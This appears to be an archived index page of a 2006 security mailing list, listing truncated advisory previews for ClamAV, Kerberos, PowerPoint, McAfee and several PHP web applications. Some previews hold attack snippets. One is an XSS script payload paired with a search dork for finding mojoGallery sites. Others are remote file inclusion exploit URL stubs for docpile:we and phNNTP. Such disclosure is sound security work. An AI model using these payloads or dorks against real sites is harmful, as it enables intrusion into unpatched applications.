|
|
Colapse all |
Post message
SUSE Security Announcement: clamav (SUSE-SA:2006:046) 2006-08-09 Ludwig Nussel (ludwig nussel suse de) [Overflow.pl] Clam AntiVirus Win32-UPX Heap Overflow 2006-08-09 pucik overflow pl Overflow.pl Security Advisory #6 Clam AntiVirus Win32-UPX Heap Overflow Vendor: Clam AntiVirus Affected version: Prior to 0.88.4 Vendor status: Fixed version released (0.88.4) Author: Damian Put <pucik (at) overflow (dot) pl [email concealed]> URL: http://www.overflow.pl/adv/clamav_upx_heap.txt Date: 09.08.2006 1. Backgroun [ more ] [ reply ] rPSA-2006-0150-1 krb5 krb5-server krb5-services krb5-test krb5-workstation 2006-08-09 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0150-1 Published: 2006-08-09 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local Root Deterministic Privilege Escalation Updated Versions: krb5=/conary.rpath.com@rpl:devel//1/1.4.1-7.2-1 krb5-server=/conary.rpath.com@rpl:devel//1/1.4.1 [ more ] [ reply ] ERRATA: [ GLSA 200608-08 ] GnuPG: Integer overflow vulnerability 2006-08-08 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Re: Will Microsoft patch remarkable old Msjet40.dll issue? 2006-08-08 Juha-Matti Laurio (juha-matti laurio netti fi) New monthly updates from Microsoft don't include patch to Msjet40.dll vulnerability affecting Access and some other products. There is patch to critical 0-day vulnerability in PowerPoint aka Mso.dll vulnerability (CVE-2006-3590): http://www.microsoft.com/technet/security/bulletin/ms06-048.mspx - J [ more ] [ reply ] MITKRB-SA-2006-001: multiple local privilege escalation vulnerabilities 2006-08-08 Tom Yu (tlyu MIT EDU) MojoScripts' xss vulnerable 2006-08-08 tugra icqmail com SOFTWARE: ========= MojoScripts' mojoGallery All version DESCRIPTION: ============ dork: "Powered by mojoGallery" add to last path /admin.cgi , admin and password input <script>alert("lol")</script> or all html tags ===================== mail: tugra (at) icqmail (dot) com [email concealed] , alp_eren (at) ayyildiz (dot) org [email concealed] [ more ] [ reply ] Microsoft PowerPoint Malformed Record Memory Corruption 2006-08-08 Sowhat (smaillist gmail com) Microsoft PowerPoint Malformed Record Memory Corruption Vulnerability By Sowhat of Nevis Labs 2006.08.08 http://www.nevisnetworks.com http://secway.org/advisory/AD20060808.txt Vendor Microsoft Inc. Microsoft PowerPoint 2000 Microsoft PowerPoint 2002 Microsoft Office PowerPoint 2003 PowerPoint [ more ] [ reply ] [ GLSA 200608-14 ] DUMB: Heap buffer overflow 2006-08-08 Sune Kloppenborg Jeppesen (jaervosz gentoo org) rPSA-2006-0147-1 mysql mysql-bench mysql-server 2006-08-07 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0147-1 Published: 2006-08-07 Products: rPath Linux 1 Rating: Informational Exposure Level Classification: Local Non-deterministic Weakness Updated Versions: mysql=/conary.rpath.com@rpl:devel//1/5.0.24-1-0.1 mysql-bench=/conary.rpath.com@rpl:devel//1/5.0.24-1 [ more ] [ reply ] docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability 2006-08-08 x0r0n hotmail com *********************************** TiTLE: docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability - Author: xoron - Class : Remote - cont@ct: x0r0n[at]hotmail[dot]com - URL: http://docpile-we.berlios.de - Exploit: http://www.site.com/[path]/lib/folder.class.php?INIT_PATH=http [ more ] [ reply ] phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability 2006-08-08 tr_zindan wolfsecurity org phNNTP v1.3 Remote File Inclusion CreW: ToxiC By:Tr_ZiNDaN mail:tr_zindan (at) wolfsecurity (dot) org [email concealed] Source Code: http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz Problem Is: require("$file_newsportal"); Page Affect: article-raw.php Path: Declare file_newsportal ExPLoit [ more ] [ reply ] [SECURITY] [DSA 1145-1] New freeradius packages fix several vulnerabilities 2006-08-07 Moritz Muehlenhoff (jmm debian org) Archangel Weblog 0.90.02 and prior Multiple HTML injections 2006-08-08 piiiiiii pppiiiiiiii (heliosz_time hotmail com) ## HeLiOsZ - Dark End Team - Internet Security Team ## Archangel Weblog 0.90.02 and prior Multiple HTML injections ## IRC: darkend.sytes.net #darkend , http://darkend.sytes.net & http://www.darkend.org ## Rish : Medium ## Type : web applet ## Creator: http://www.archangelmgt.com/ ## Exploit: - T [ more ] [ reply ] ZDI-06-027: Microsoft Internet Explorer CSS Class Ordering Memory Corruption Vulnerability 2006-08-08 zdi-disclosures 3com com ZDI-06-026: Microsoft Internet Explorer Multiple CSS Imports Memory Corruption Vulnerability 2006-08-08 zdi-disclosures 3com com TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities 2006-08-08 TSRT 3com com TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities http://www.tippingpoint.com/security/advisories/TSRT-06-07.html August 8, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: Enterprise Security Anal [ more ] [ reply ] [EEYEB-20060719] McAfee Subscription Manager Stack Buffer Overflow 2006-08-07 eEye Advisories (Advisories eeye com) McAfee Subscription Manager Stack Buffer Overflow Release Date: August 7, 2006 Date Reported: July 19, 2006 Patch Development Time (In Days): 17 Days Severity: High (Remote Code Execution) Vendor: McAfee Systems Affected: McAfee AntiSpyware 1.x, 2.x McAfee Internet Security Suite 6.x, 7.x [ more ] [ reply ] Announcement: Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations [Whitepaper] 2006-08-07 SPI Labs (Spi Labs spidynamics com) "One new feature of "Web 2.0", the movement to build a more responsive Web, is the utilization of XML content feeds which use the RSS and Atom standards. These feeds allow both users and Web sites to obtain content headlines and body text without needing to visit the site in question, basically pro [ more ] [ reply ] phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability 2006-08-07 sh3ll sh3ll ir ------------------------------------------------------------------------ --------------- phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion ------------------------------------------------------------------------ --------------- Author : Sh3ll Date : 2006/04/27 Location : Ira [ more ] [ reply ] AUTODAFE: an Act of Software Torture [FUZZER] 2006-08-04 Martin Vuagnoux (autodafe vuagnoux com) Dear list, let me present you the public release of a fuzzer presented at 22c3: Autodafé is a fuzzing framework able to uncover buffer overflows by using the fuzzing by weighting attacks with markers technique. http://autodafe.sourceforge.net You will find a paper explaining the technique used, [ more ] [ reply ] Re: [Full-disclosure] Attacking the local LAN via XSS 2006-08-04 Thierry Zoller (Thierry Zoller lu) (1 replies) Dear pdp (architect), pa> xecuted of the border router domain I'd like to see a "border router" serving images on port 80 ??? Doesn't make sense, really ;) No pun intented. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 [ more ] [ reply ] Re: [Full-disclosure] Attacking the local LAN via XSS 2006-08-04 pdp (architect) (pdp gnucitizen googlemail com) Re: [Full-disclosure] Attacking the local LAN via XSS 2006-08-04 Schanulleke (schalulleke gmail com) |
|
Privacy Statement |
Ubuntu Security Notice USN-333-1 August 09, 2006
libwmf vulnerability
CVE-2006-3376
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.04
Ubuntu 5.10
Ub
[ more ] [ reply ]